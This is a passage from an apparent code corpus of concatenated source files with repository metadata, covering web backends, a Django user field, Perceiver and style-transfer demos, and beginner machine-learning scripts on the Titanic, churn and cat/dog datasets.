expr = self.parse_filter(value)
if self.register_filter:
self.registered_filters.append(expr)
return expr
def parse_filter(self, expr: str) -> Expression:
return self.filter_cls(expr)
@staticmethod
def escape(value: str) -> str:
return (
value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"').strip()
)
class MacroFilterType(FilterType):
"""
A `FilterType` that expands the parameter input by putting it into a
format defined by the class variable `macro`.
"""
macro = "{}"
def parse_filter(self, expr: str) -> Expression:
return super().parse_filter(self.macro.format(expr))
class CommandType(MacroFilterType):
"""
Filter commands on their command_name.
"""
name = "COMMAND_NAME"
macro = "type == 'command' and command_name == '{}'"
class ContactType(MacroFilterType):
"""
Filter contacts on their contact_name.
"""
name = "CONTACT_NAME"
macro = "type == 'contact' and contact_name == '{}'"
class HostType(MacroFilterType):
"""
Filter hosts on their host_name.
"""
name = "HOST_NAME"
macro = "type == 'host' and host_name == '{}'"
class HostgroupType(MacroFilterType):
"""
Filter hostgroups on their hostgroup_name.
"""
name = "HOSTGROUP_NAME"
macro = "type == 'hostgroup' and hostgroup_name == '{}'"
class ServiceType(FilterType):
"""
Filter services on their host_name and service_description, separated by
semicolon.
"""
name = "HOST_NAME;SERVICE_DESCRIPTION"
def parse_filter(self, expr: str) -> Expression:
if ";" in expr:
host_name, service_description = expr.split(";", 1)
expr = (
"type == 'service' and host_name == '{}' "
"and service_description == '{}'"
).format(
self.escape(host_name),
self.escape(service_description),
)
else:
expr = "type == 'service' and service_description == '{}'".format(
self.escape(expr),
)
return super().parse_filter(expr)
class ServicegroupType(MacroFilterType):
"""
Filter servicegroups on their servicegroup_name.
"""
name = "SERVICEGROUP_NAME"
macro = "type == 'servicegroup' and servicegroup_name == '{}'"
class FilterFile(FilterType, click.Path):
"""
A `FilterType` that reads filters from file.
"""
name = "FILTER_FILE"
def __init__(self, filter_cls: Expression, *args, **kwargs):
FilterType.__init__(self, filter_cls)
click.Path.__init__(self, *args, **kwargs)
def convert(self, value: t.Any, *args) -> t.List[Expression]:
if isinstance(value, list):
return value
filepath = click.Path.convert(self, value, *args)
values = []
with open(filepath, "r") as fh:
for line in fh:
line = line.strip()
if line:
values.append(FilterType.convert(self, line, *args))
return values
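# Editor's usage sketch (hypothetical values): each macro type expands a bare name into a
# full filter expression before wrapping it in Expression, e.g.
#
#   HostType().convert("web01")
#   -> Expression("type == 'host' and host_name == 'web01'")
#
#   ServiceType().convert("web01;HTTP")
#   -> Expression("type == 'service' and host_name == 'web01' "
#                 "and service_description == 'HTTP'")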
``` |
{
"source": "jimorie/scorebored",
"score": 2
} |
#### File: components/game/service.py
```python
from scorebored.overrides.aioli_rdbms.service import NamedDatabaseModelService
from .database import GameModel
class GameService(NamedDatabaseModelService):
async def on_startup(self):
"""
Register database model.
"""
await self.set_db_model(GameModel)
await self.set_db_name_field("name")
``` |
{
"source": "jimorsm/vue-element-admin-fastapi",
"score": 2
} |
#### File: api_v1/report/gen_report.py
```python
import importlib
from app.api.api_v1.report.gen_excel import gen_template
class Report():
def __init__(self, code, query_params):
self.code = code
self.module_url = "app.api.api_v1.report.report." + code
self.module = self.import_module(self.module_url).Query(query_params=query_params)
def import_module(self, module_url):
return importlib.import_module(module_url)
class BaseQuery():
def __init__(self, query_params):
self.query_params = query_params
self.header = []
self.file_name = ""
self.report_config()
def report_config(self):
pass
def get_template(self):
return gen_template(self.header, self.file_name)
def instance_data(self):
return []
def get_instance(self, db):
self.db = db
data = self.instance_data()
return gen_template(self.header, self.file_name, data)
```
#### File: app/crud/crud_menu.py
```python
from typing import Any, Dict, Optional, Union
from sqlalchemy.orm import Session
from app.core.security import get_password_hash, verify_password
from app.crud.base import CRUDBase
from app.models.role import Menu
from app.schemas.system.menu import MenuCreate, MenuUpdate
class CRUDMenu(CRUDBase[Menu, MenuCreate, MenuUpdate]):
def get_by_username(self, db: Session, *, username: str) -> Optional[Menu]:
return db.query(Menu).filter(Menu.username == username).first()
def create(self, db: Session, *, obj_in: MenuCreate) -> Menu:
db_obj = Menu(
username=obj_in.username,
hashed_password=get_password_hash(obj_in.password),
full_name=obj_in.full_name,
is_superuser=obj_in.is_superuser,
)
db.add(db_obj)
db.commit()
db.refresh(db_obj)
return db_obj
def update(
self, db: Session, *, db_obj: Menu, obj_in: Union[MenuUpdate, Dict[str, Any]]
) -> Menu:
if isinstance(obj_in, dict):
update_data = obj_in
else:
update_data = obj_in.dict(exclude_unset=True)
if update_data["password"]:
hashed_password = get_password_hash(update_data["password"])
del update_data["password"]
update_data["hashed_password"] = hashed_password
return super().update(db, db_obj=db_obj, obj_in=update_data)
user = CRUDMenu(Menu)
```
#### File: app/db/init_db.py
```python
import os, logging
import pandas as pd
import numpy as np
from app.db.session import engine
logger = logging.getLogger(__name__)
def init_db() -> None:
# Tables should be created with Alembic migrations
init_data_path = os.path.join(os.path.dirname(__file__), "init_data")
files = ['department.csv', 'menu.csv', 'role.csv', 'user.csv', 'dict_type.csv', 'dict_data.csv',
'role_menu.csv', 'user_department.csv', 'user_dict.csv', 'user_role.csv', ]
for file in files:
file_path = os.path.join(init_data_path, file)
df = pd.read_csv(file_path, sep=",")
if file == "menu.csv":
            df['component'] = df['component'].apply(lambda x: '' if pd.isna(x) else x)
            df['name'] = df['name'].apply(lambda x: '' if pd.isna(x) else x)
logger.info(f"{file} load successed")
df.to_sql(file.replace(".csv", ""), engine, if_exists="append", index=False)
``` |
{
"source": "jimothyGator/django-currentuser",
"score": 2
} |
#### File: db/models/fields.py
```python
import warnings
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django_currentuser.middleware import get_current_authenticated_user
class CurrentUserField(models.ForeignKey):
warning = ("You passed an argument to CurrentUserField that will be "
"ignored. Avoid args and following kwargs: default, null, to.")
description = _(
'as default value sets the current logged in user if available')
defaults = dict(null=True, default=get_current_authenticated_user,
to=settings.AUTH_USER_MODEL)
def __init__(self, *args, **kwargs):
self._warn_for_shadowing_args(*args, **kwargs)
if "on_delete" not in kwargs:
kwargs["on_delete"] = models.CASCADE
kwargs.update(self.defaults)
super(CurrentUserField, self).__init__(**kwargs)
def _warn_for_shadowing_args(self, *args, **kwargs):
if args:
warnings.warn(self.warning)
else:
for key in set(kwargs).intersection(set(self.defaults.keys())):
if not kwargs[key] == self.defaults[key]:
warnings.warn(self.warning)
break
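# Editor's usage sketch (hypothetical model, not part of this module): the field is used
# like a plain ForeignKey and defaults to the currently authenticated user, e.g.
#
#   class Post(models.Model):
#       title = models.CharField(max_length=100)
#       created_by = CurrentUserField()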
``` |
{
"source": "JimothyJohn/PerceiverToolkit",
"score": 3
} |
#### File: JimothyJohn/PerceiverToolkit/app.py
```python
import streamlit as st
import numpy as np
import cv2
import imageio
from perceiver import perceiver, io_processors
import OpticalFlow
import Classification
# Extract flows from imageio reader
def GetFlows(reader, sampleRate=5, start=0, length=1):
# Get first frame from reader
firstFrame = reader.get_data(start)
# Get original dimensions for output
width, height = reader.get_meta_data()["source_size"]
# Create feedback for process
my_bar = st.progress(0)
# Create writer for video file
w = imageio.get_writer('outputs/flowing.mp4',
format='FFMPEG', mode='I', fps=int(FPS/sampleRate))
# Loop through input video
for idx in range(length):
# Grab next frame
secondFrame = reader.get_data((idx+start+1)*sampleRate)
# Extract flow using notebook example
flow = OpticalFlow.ExtractFlow(firstFrame, secondFrame)[0]
# Move to next frame
firstFrame = secondFrame
# Convert flow to BGR image
flowImage = OpticalFlow.visualize_flow(flow)
# Write resized flow output to video file
w.append_data(cv2.resize(flowImage, (width, height)))
# Increment progress bar
my_bar.progress(idx/(length-1))
w.close()
return
st.set_page_config(page_title='Perceiver IO', page_icon='docs/deepmind-logo.png',
layout="wide", initial_sidebar_state="auto", menu_items=None)
st.sidebar.header('Perceiver IO')
program = st.sidebar.selectbox('Choose a function', [
'Optical Flow',
'Image Classification',
'Language Modeling',
'Video Autoencoding'], 0)
st.header(program)
left, right = st.columns(2)
if program == 'Optical Flow':
inputFile = st.file_uploader("Upload a video")
if inputFile is not None:
inputVideo = inputFile.getvalue()
reader = imageio.get_reader(inputVideo, '.mp4')
FPS = reader.get_meta_data()["fps"]
vidLength = reader.get_meta_data()["duration"]
sampleRate = st.slider('Sample rate (frames)', 1, 10, 3, 1)
startTime = int(st.slider('Start time (s)', 0.,
vidLength, 0., 0.1)*FPS/sampleRate)
length = int(st.slider('Length (s)', 0.1, vidLength -
startTime, 1., 0.1)*FPS/sampleRate)
left.video(inputVideo)
flows = GetFlows(reader, sampleRate, startTime, length)
right.video('outputs/flowing.mp4')
elif program == 'Image Classification':
inputFile = st.file_uploader("Upload an image to classify")
if inputFile is not None:
inputImage = inputFile.getvalue()
inputArray = imageio.imread(inputImage)
left.image(inputImage)
results = Classification.ClassifyImage(inputArray)
right.write(results)
elif program == 'Language Modeling':
st.header('In progress...')
elif program == 'Video Autoencoding':
st.header('In progress...')
```
#### File: JimothyJohn/PerceiverToolkit/Language.py
```python
from typing import Union
import haiku as hk
import jax
import jax.numpy as jnp
import numpy as np
import pickle
from perceiver import perceiver, position_encoding, io_processors, bytes_tokenizer
# One of learned_position_encoding, fourier_position_encoding, or conv_preprocessing'
# learned_position_encoding: Uses a learned position encoding over the image
# and 1x1 convolution over the pixels
# fourier_position_encoding: Uses a 2D fourier position encoding
# and the raw pixels
# conv_preprocessing: Uses a 2D fourier position encoding
# and a 2D conv-net as preprocessing
# @param ['learned_position_encoding', 'fourier_position_encoding', 'conv_preprocessing']
with open("models/language_perceiver_io_bytes.pickle", "rb") as f:
params = pickle.loads(f.read())
D_MODEL = 768
D_LATENTS = 1280
MAX_SEQ_LEN = 2048
encoder_config = dict(
num_self_attends_per_block=26,
num_blocks=1,
z_index_dim=256,
num_z_channels=D_LATENTS,
num_self_attend_heads=8,
num_cross_attend_heads=8,
qk_channels=8 * 32,
v_channels=D_LATENTS,
use_query_residual=True,
cross_attend_widening_factor=1,
self_attend_widening_factor=1)
decoder_config = dict(
output_num_channels=D_LATENTS,
position_encoding_type='trainable',
output_index_dims=MAX_SEQ_LEN,
num_z_channels=D_LATENTS,
qk_channels=8 * 32,
v_channels=D_MODEL,
num_heads=8,
final_project=False,
use_query_residual=False,
trainable_position_encoding_kwargs=dict(num_channels=D_MODEL))
# The tokenizer is just UTF-8 encoding (with an offset)
tokenizer = bytes_tokenizer.BytesTokenizer()
def apply_perceiver(
inputs: jnp.ndarray, input_mask: jnp.ndarray) -> jnp.ndarray:
"""Runs a forward pass on the Perceiver.
Args:
inputs: input bytes, an int array of shape [B, T]
input_mask: Array of shape indicating which entries are valid and which are
masked. A truthy value indicates that the entry is valid.
Returns:
The output logits, an array of shape [B, T, vocab_size].
"""
assert inputs.shape[1] == MAX_SEQ_LEN
embedding_layer = hk.Embed(
vocab_size=tokenizer.vocab_size,
embed_dim=D_MODEL)
embedded_inputs = embedding_layer(inputs)
batch_size = embedded_inputs.shape[0]
input_pos_encoding = perceiver.position_encoding.TrainablePositionEncoding(
index_dim=MAX_SEQ_LEN, num_channels=D_MODEL)
embedded_inputs = embedded_inputs + input_pos_encoding(batch_size)
perceiver_mod = perceiver.Perceiver(
encoder=perceiver.PerceiverEncoder(**encoder_config),
decoder=perceiver.BasicDecoder(**decoder_config))
output_embeddings = perceiver_mod(
embedded_inputs, is_training=False, input_mask=input_mask, query_mask=input_mask)
logits = io_processors.EmbeddingDecoder(
embedding_matrix=embedding_layer.embeddings)(output_embeddings)
return logits
apply_perceiver = hk.transform(apply_perceiver).apply
input_str = "This is an incomplete sentence where some words are missing."
input_tokens = tokenizer.to_int(input_str)
# Mask " missing.". Note that the model performs much better if the masked chunk
# starts with a space.
input_tokens[51:60] = tokenizer.mask_token
print("Tokenized string without masked bytes:")
print(tokenizer.to_string(input_tokens))
inputs = input_tokens[None]
input_mask = np.ones_like(inputs)
def pad(max_sequence_length: int, inputs, input_mask):
input_len = inputs.shape[1]
assert input_len <= max_sequence_length
pad_len = max_sequence_length - input_len
padded_inputs = np.pad(
inputs,
pad_width=((0, 0), (0, pad_len)),
constant_values=tokenizer.pad_token)
padded_mask = np.pad(
input_mask,
pad_width=((0, 0), (0, pad_len)),
constant_values=0)
return padded_inputs, padded_mask
inputs, input_mask = pad(MAX_SEQ_LEN, inputs, input_mask)
rng = jax.random.PRNGKey(1) # Unused
out = apply_perceiver(params, rng=rng, inputs=inputs, input_mask=input_mask)
masked_tokens_predictions = out[0, 51:60].argmax(axis=-1)
print("Greedy predictions:")
print(masked_tokens_predictions)
print()
print("Predicted string:")
print(tokenizer.to_string(masked_tokens_predictions))
``` |
{
"source": "JimothyJohn/YTStyleTransfer",
"score": 2
} |
#### File: YTStyleTransfer/Python/addstyle.py
```python
import os, shutil, functools, argparse
from matplotlib import gridspec
import matplotlib.pylab as plt
import numpy as np
import tensorflow as tf
tf.compat.v1.enable_eager_execution()
import tensorflow_hub as hub
## Imaging tools
import PIL
from PIL import Image
from PIL import ImageFilter
from PIL import ImageDraw
from PIL import ImageFont
# Load image path as tf tensor ADJUST MAX DIMS
def load_img(path_to_img):
max_dim = 1024 # maximum size that is compatible with model
img = tf.io.read_file(path_to_img) # read file and return a tensor type of string
img = tf.image.decode_image(img, channels=3) # convert bytes-type string above into Tensor of dtype
img = tf.image.convert_image_dtype(img, tf.float32) # convert to float32 dtype
shape = tf.cast(tf.shape(img)[:-1], tf.float32) # get LAST two axes as resolution / dimensions in float values
long_dim = max(shape) # find longest side
scale = max_dim / long_dim # find scaling factor based on largest side
new_shape = tf.cast(shape * scale, tf.int32) # create new shape based on scale
img = tf.image.resize(img, new_shape) # resize to new shape
img = img[tf.newaxis, :] # adds another axis aka brackets on the outside
return img # return image
# Converts tensor to PIL.Image
def tensor_to_image(tensor):
tensor = tensor*255 # convert tensor from 0-1 to 0-255
tensor = np.array(tensor, dtype=np.uint8) # convert tensor type to integer for RGB indexing
if np.ndim(tensor)>3: # if tensor is more than W xH x channel
assert tensor.shape[0] == 1 # flatten?
tensor = tensor[0] # grab initial index
return PIL.Image.fromarray(tensor) # convert np to PIL image
# Apply style to content with optional mask
def style_image(contentPath, styleTensor):
contentTensor = load_img(contentPath)
stylizedTensor = hub_module(tf.constant(contentTensor), tf.constant(styleTensor))[0]
outputTensor = tf.squeeze(stylizedTensor, axis=0) # get rid of batch dimension
return tensor_to_image(outputTensor) # convert tensor back to image
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--style', help='input file')
args = parser.parse_args()
# Directories
CONTENT_PATH = '/input/frames/'
MASK_PATH = '/input/motion/'
STYLIZED_PATH = '/input/stylized/'
# Flags
MASKING = False
styleTensor = load_img('/input/SampleImages/'+args.style+'.jpg')
contentTensor = load_img(CONTENT_PATH+'clip.0001.png')
_, height, width, _ = contentTensor.shape
# Load TF-Hub module.
hub_handle = 'https://tfhub.dev/google/magenta/arbitrary-image-stylization-v1-256/2'
hub_module = hub.load(hub_handle)
lastImage = style_image(CONTENT_PATH+'clip.0001.png', styleTensor)
lastImage.save('/input/stylized/stylized.0001.png')
for idx, framePath in enumerate(sorted(os.listdir(CONTENT_PATH))):
if idx==0: continue # skip first frame
styleImage = style_image(CONTENT_PATH+framePath, styleTensor).resize((width, height), Image.ANTIALIAS)
try:
flowMask = Image.open(MASK_PATH+'motion.{:04d}.png'.format(idx-1)).resize((width, height), Image.ANTIALIAS) # change to idx+1
except:
break
if MASKING:
segMask = Image.open('/input/segments/segment.{:04d}.png'.format(idx))
outputMask = flowMask & segMask # merge style and flow images
else:
outputMask = flowMask
lastImage = Image.composite(styleImage, lastImage, flowMask)
lastImage.save('/input/stylized/stylized.{:04d}.png'.format(idx+1))
``` |
{
"source": "jimothyr/pcduino-photobooth",
"score": 3
} |
#### File: pcduino-photobooth/main/online.py
```python
import urllib2
def internet_on():
try:
response=urllib2.urlopen('http://192.168.127.12',timeout=1)
return True
except urllib2.URLError as err: pass
return False
def phone_home():
if internet_on():
print 'secret key'
print 'send stats'
print 'start syncing files!!'
def write_out_data(data):
    file = open("data.file.txt", 'a')
file.write(data)
file.close()
#write outs file list in form to be sucked in by javascript on webserver
``` |
{
"source": "JimouChen/computer-vision",
"score": 3
} |
#### File: computer-vision/Basic/draw_pic.py
```python
import numpy as np
import cv2
import matplotlib.pyplot as plt
def draw_img(image):
plt.imshow(image)
plt.axis('off')
plt.show()
# Create a black background image: 300 x 300 with 3 channels
black_img = np.zeros((300, 300, 3), dtype='uint8')
draw_img(black_img)
# Draw straight lines
green = (0, 255, 0)
cv2.line(black_img, (0, 0), (300, 300), green, thickness=5)  # arguments are the start point and end point
draw_img(black_img)
blue = (0, 0, 225)
cv2.line(black_img, (300, 0), (150, 150), blue, 8)
draw_img(black_img)
# Draw rectangles
red = (255, 0, 0)
cv2.rectangle(black_img, (20, 20), (60, 60), red, 2)
draw_img(black_img)
# thickness=-1 draws a filled rectangle
cv2.rectangle(black_img, (50, 50), (100, 250), green, -1)
draw_img(black_img)
# Draw circles
white = (255, 255, 255)
# Center of the circles
(rx, ry) = black_img.shape[1] // 2, black_img.shape[0] // 2
# Loop to draw circles with increasing radii
for r in range(0, 151, 15):
cv2.circle(black_img, (rx, ry), r, white, 2)
draw_img(black_img)
'''Randomly generated circles'''
# Create a fresh black canvas
new_img = np.zeros((300, 300, 3), dtype='uint8')
# Draw 10 circles
for i in range(10):
    # Random radius
r = np.random.randint(5, 200)
    # Random color
color = np.random.randint(0, 255, size=(3,)).tolist()
    # Random center
point = np.random.randint(0, 300, size=(2,))
    # Draw a filled circle
cv2.circle(new_img, tuple(point), r, color, -1)
draw_img(new_img)
```
#### File: PytorchLearning/project/cat_dog_classify.py
```python
import torch
from torch import nn, optim
from torchvision import datasets, transforms, models
from torch.utils.data import DataLoader
import sys
if __name__ == '__main__':
    # Data preprocessing: transforms handles the images and adds data augmentation
    transform = transforms.Compose([
        transforms.RandomResizedCrop(224),  # randomly crop the image, then resize to 224*224
        transforms.RandomRotation(20),  # randomly rotate up to 20 degrees clockwise or counter-clockwise
        transforms.RandomHorizontalFlip(p=0.5),  # flip horizontally with probability 0.5
        transforms.ToTensor()
    ])
    # Read the data
train_dataset = datasets.ImageFolder('image/train', transform)
test_dataset = datasets.ImageFolder('image/test', transform)
    # Load the data with DataLoader, setting the batch size and shuffling
train_loader = DataLoader(train_dataset, batch_size=8, shuffle=True)
test_loader = DataLoader(test_dataset, batch_size=8, shuffle=True)
# print(train_dataset.classes)
model = models.vgg16(pretrained=False)
print(model)
    # With this loop the convolutional layers are frozen: only the fully connected layers
    # are trained and the conv weights are not updated, because the conv layers are assumed
    # to be already well trained. Without it accuracy can be higher, but training takes much longer.
for p in model.parameters():
p.requires_grad = False
    # Build a new fully connected head: 25088 matches the model's flattened feature size, and the output is our 2 custom classes
model.classifier = nn.Sequential(
nn.Linear(25088, 100),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(100, 2)
)
    # Define the loss function
entropy_loss = nn.CrossEntropyLoss()
    # Define the optimizer
opt = optim.Adam(model.parameters(), lr=0.0003)
def train():
model.train()
for i, data in enumerate(train_loader):
            # Get the data and the corresponding labels
            inputs, labels = data
            # Get the predictions
            out = model(inputs)
            # Compute the loss
            loss = entropy_loss(out, labels)
            # Zero the gradients, then backpropagate
            opt.zero_grad()
            loss.backward()
            # Update the weights
            opt.step()
def test():
model.eval()
correct = 0
for i, data in enumerate(test_loader):
            # Get the data and the corresponding labels
            inputs, labels = data
            # Get the model predictions
            out = model(inputs)
            # Get the maximum value and the position (class index) of the maximum
            _, predicted = torch.max(out, 1)
            # Count the number of correct predictions
correct += (predicted == labels).sum()
print("Test acc: {0}".format(correct.item() / len(test_dataset)))
correct = 0
for i, data in enumerate(train_loader):
            # Get the data and the corresponding labels
            inputs, labels = data
            # Get the model predictions
            out = model(inputs)
            # Get the maximum value and the position (class index) of the maximum
            _, predicted = torch.max(out, 1)
            # Count the number of correct predictions
correct += (predicted == labels).sum()
print("Train acc: {0}".format(correct.item() / len(train_dataset)))
for epoch in range(10):
        print('Epoch:', epoch)
train()
test()
    # Save the model
torch.save(model.state_dict(), 'cat_dog.pth')
``` |
{
"source": "JimouChen/kaggle-project",
"score": 3
} |
#### File: kaggle-project/ChurnModelling/churn_predict.py
```python
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report
def deal_train(path):
train_data = pd.read_csv(path)
    # Convert the country column to numbers
train_data.loc[train_data['Geography'] == 'France', 'Geography'] = 1
train_data.loc[train_data['Geography'] == 'Spain', 'Geography'] = 2
train_data.loc[train_data['Geography'] == 'Germany', 'Geography'] = 3
    # Convert gender to numbers
train_data.loc[train_data['Gender'] == 'Female', 'Gender'] = 0
train_data.loc[train_data['Gender'] == 'Male', 'Gender'] = 1
    # Select the useful features
feature = ['CreditScore', 'Geography', 'Gender',
'Age', 'Tenure', 'Balance', 'NumOfProducts',
'HasCrCard', 'IsActiveMember', 'EstimatedSalary']
x_data = train_data[feature]
y_data = train_data['Exited']
    # Standardize the data
sc = StandardScaler()
x_data = sc.fit_transform(x_data)
return x_data, y_data
if __name__ == '__main__':
x_train_data, y_train_data = deal_train('data/Churn-Modelling.csv')
x_test, y_test = deal_train('data/Churn-Modelling-Test-Data.csv')
    # Build the model (other models are worth trying too)
lr = LogisticRegression()
lr.fit(x_train_data, y_train_data)
    # Predict
pred = lr.predict(x_test)
print(classification_report(pred, y_test))
print(lr.score(x_test, y_test))
```
#### File: MathematicalModeling/test_data/Test.py
```python
import numpy as np
def calculate(a, b):
    # Compute the fitted formula
g = -0.168 * a - 0.06 * b
L = 1 / (1 + pow(np.e, -g))
return L
def pred():
l = [51, 172, 43, 67, 193, 86, 198, 205, 97, 33]
l.sort()
print(l)
#
# index = [33, 43, 51, 67, 86, 97, 172, 193, 205]
# lay = []
# for i in range(0, 302):
# lay.append(0)
#
# for i in range(len(lay)):
# if i in index:
# lay[i] = 1
#
# print(lay)
# print(sum(lay))
# import matplotlib.pyplot as plt
#
# center = np.array([[-0.10124706, 0.25642006, - 0.09359024],
# [-0.23356946, - 0.30465014, 10.68487533],
# [7.34213732, - 0.26447147, - 0.09359024],
# [0.03852011, - 3.89985084, - 0.09359024]])
# colors = ['r', 'b', 'y', 'g']
# new_x_data = center[:, 0]
# new_y_data = center[:, 1]
# new_z_data = center[:, 2]
# ax = plt.figure().add_subplot(111, projection='3d')
# ax.scatter(new_x_data, new_y_data, new_z_data, c=colors, s=20)
# plt.show()
```
#### File: kaggle-project/TitanicPredict/predict_process.py
```python
import sys
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report
import pandas as pd
# Handle the missing data first
def deal_train(train_data):
    # Fill missing ages with the median age
    train_data['Age'] = train_data['Age'].fillna(train_data['Age'].median())
    # print(train_data.describe())
    # Convert gender to 0 and 1; loc selects data by row and column labels
train_data.loc[train_data['Sex'] == 'male', 'Sex'] = 1
train_data.loc[train_data['Sex'] == 'female', 'Sex'] = 0
# print(train_data.loc[:, 'Sex'])
    # Handle Embarked (port of embarkation)
    # print(train_data['Embarked'].unique())  # check how many categories there are
    # 'S' is the most common value, so fill the missing values with 'S'
    train_data['Embarked'] = train_data['Embarked'].fillna('S')
    # Convert to numbers
train_data.loc[train_data['Embarked'] == 'S', 'Embarked'] = 0
train_data.loc[train_data['Embarked'] == 'C', 'Embarked'] = 1
train_data.loc[train_data['Embarked'] == 'Q', 'Embarked'] = 2
    '''Next, select the useful features'''
    feature = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']
    x_data = train_data[feature]
    y_data = train_data['Survived']  # the label to predict
    # Standardize the data
scaler = StandardScaler()
x_data = scaler.fit_transform(x_data)
return x_data, y_data
# Preprocess the test set data
def deal_test(test_data, label_data):
    # Fill the missing Age and Fare values
test_data['Age'] = test_data['Age'].fillna(test_data['Age'].median())
test_data['Fare'] = test_data['Fare'].fillna(test_data['Fare'].median())
    # Convert the gender strings to numbers
test_data.loc[test_data['Sex'] == 'male', 'Sex'] = 1
test_data.loc[test_data['Sex'] == 'female', 'Sex'] = 0
    # Convert the embarkation port to numbers
test_data.loc[test_data['Embarked'] == 'S', 'Embarked'] = 0
test_data.loc[test_data['Embarked'] == 'C', 'Embarked'] = 1
test_data.loc[test_data['Embarked'] == 'Q', 'Embarked'] = 2
    # Next, select the useful features
feature = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']
x_data = test_data[feature]
y_data = label_data['Survived']
    # Standardize the data
scaler = StandardScaler()
x_data = scaler.fit_transform(x_data)
return x_data, y_data
if __name__ == '__main__':
    # Read in the training and test sets
train_data = pd.read_csv('data/train.csv')
test_data = pd.read_csv('data/test.csv')
real_label_data = pd.read_csv('data/gender_submission.csv')
    # Preprocess the training and test sets
x_train, y_train = deal_train(train_data)
x_test, y_test = deal_test(test_data, real_label_data)
    # Build the model
rf = RandomForestClassifier(n_estimators=10, max_depth=3, min_samples_split=4)
bagging = BaggingClassifier(rf, n_estimators=12)
bagging.fit(x_train, y_train)
    # Predict
prediction = bagging.predict(x_test)
    # Evaluate
print(bagging.score(x_test, y_test))
print((classification_report(prediction, y_test)))
    # Save the predictions as a csv file
submission = pd.DataFrame({
"PassengerId": test_data["PassengerId"],
"Survived": prediction
})
submission.to_csv('predict.csv', index=False)
``` |
{
"source": "JimouChen/machine-learning",
"score": 3
} |
#### File: machine_learning/practice/draw_heat_map.py
```python
import numpy as np
import pandas as pd
# Define a correlation heat map for a more intuitive view of the relationships
def heat_map(data):
import matplotlib.pyplot as plt
import seaborn as sns
    plt.subplots(figsize=(data.shape[0], data.shape[1]))  # figure size matches the shape of data
correlation_mat = data.corr()
sns.heatmap(correlation_mat, annot=True, cbar=True, square=True, fmt='.2f', annot_kws={'size': 10})
plt.show()
data = pd.read_csv('data/wine.csv')
data = data.iloc[:, 1:]  # drop the year column
# Compute the pairwise column correlations, returning the correlation matrix rounded to 3 decimals
print('Correlation matrix:\n', np.round(data.corr(method='pearson'), 3))
# Draw the correlation heat map
heat_map(data)
```
#### File: practice/exp/exp11.py
```python
from sklearn.linear_model import Lasso, LinearRegression, Ridge
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# Draw the fitted line from the model's slope and intercept
def draw_line(model, color):
k = model.coef_
b = model.intercept_
line = k * x_data + b
plt.plot(x_data, line, color, 50)
plt.scatter(x_data, y_data, c='r')
plt.show()
# Build the expression string of the fitted line
def get_express(model):
k = '%.2f' % model.coef_[0]
b = model.intercept_
if b > 0:
b = '+' + '%.2f' % b
else:
b = '%.2f' % b
return 'y = ' + k + '*x' + b
if __name__ == '__main__':
    # Generate a data set and add noise
x_data, y_data = make_regression(n_samples=200, noise=20, n_features=1, random_state=30)
x_train, x_test, y_train, y_test = train_test_split(x_data, y_data)
y_data = y_data.reshape(-1, 1)
    # Linear regression
    lr_model = LinearRegression()
    lr_model.fit(x_train, y_train)
    lr_prediction = lr_model.predict(x_test)
    print('Linear regression accuracy:', lr_model.score(x_test, y_test))
    print('Linear regression expression:', get_express(lr_model))
    # Ridge regression
    rd_model = Ridge()
    rd_model.fit(x_train, y_train)
    rd_prediction = rd_model.predict(x_test)
    print('Ridge regression accuracy:', rd_model.score(x_test, y_test))
    print('Ridge regression expression:', get_express(rd_model))
    # Lasso regression
    ls_model = Lasso()
    ls_model.fit(x_train, y_train)
    ls_prediction = ls_model.predict(x_test)
    print('Lasso regression accuracy:', ls_model.score(x_test, y_test))
    print('Lasso regression expression:', get_express(ls_model))
draw_line(lr_model, 'b')
draw_line(rd_model, 'y')
draw_line(ls_model, 'g')
```
#### File: practice/exp/exp22.py
```python
from sklearn.naive_bayes import GaussianNB, BernoulliNB
import pandas as pd
# Preprocess the training data
def handle_data(data):
    # Convert the non-numeric features to numbers
data.loc[data['Outlook'] == 'Sunny', 'Outlook'] = 0
data.loc[data['Outlook'] == 'Overcast', 'Outlook'] = 1
data.loc[data['Outlook'] == 'Rain', 'Outlook'] = 2
data.loc[data['Temperature'] == 'Hot', 'Temperature'] = 0
data.loc[data['Temperature'] == 'Mild', 'Temperature'] = 1
data.loc[data['Temperature'] == 'Cool', 'Temperature'] = 2
data.loc[data['Humidity'] == 'High', 'Humidity'] = 0
data.loc[data['Humidity'] == 'Normal', 'Humidity'] = 1
data.loc[data['Wind'] == 'Weak', 'Wind'] = 0
data.loc[data['Wind'] == 'Strong', 'Wind'] = 1
    # Convert the label to numbers
data.loc[data['PlayTennis'] == 'No', 'PlayTennis'] = 0
data.loc[data['PlayTennis'] == 'Yes', 'PlayTennis'] = 1
    # Return the processed training data and the test sample
x_data = data.iloc[:-1, 1:-1]
y_data = data.iloc[:-1, -1].astype('int')
x_test = data.iloc[-1, 1:-1].values.reshape(1, -1)
return x_data, y_data, x_test
if __name__ == '__main__':
my_data = pd.read_csv('data.csv')
x_data, y_data, x_test = handle_data(my_data)
    # Build and fit the model, using a Gaussian naive Bayes model here
    gs_model = GaussianNB()
    gs_model.fit(x_data, y_data.ravel())
    print('Gaussian model accuracy:', gs_model.score(x_data, y_data))
    prediction = gs_model.predict(x_test)
    print('Predicted class:', prediction)
bnl_model = BernoulliNB()
bnl_model.fit(x_data, y_data.ravel())
    print('Bernoulli model accuracy:', bnl_model.score(x_data, y_data))
    prediction = bnl_model.predict(x_test)
    print('Predicted class:', prediction)
    if prediction == [0]:
        print('Predicted result: do not go play tennis')
    else:
        print('Predicted result: go play tennis')
```
#### File: practice/final_project/orl_face_recognition.py
```python
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
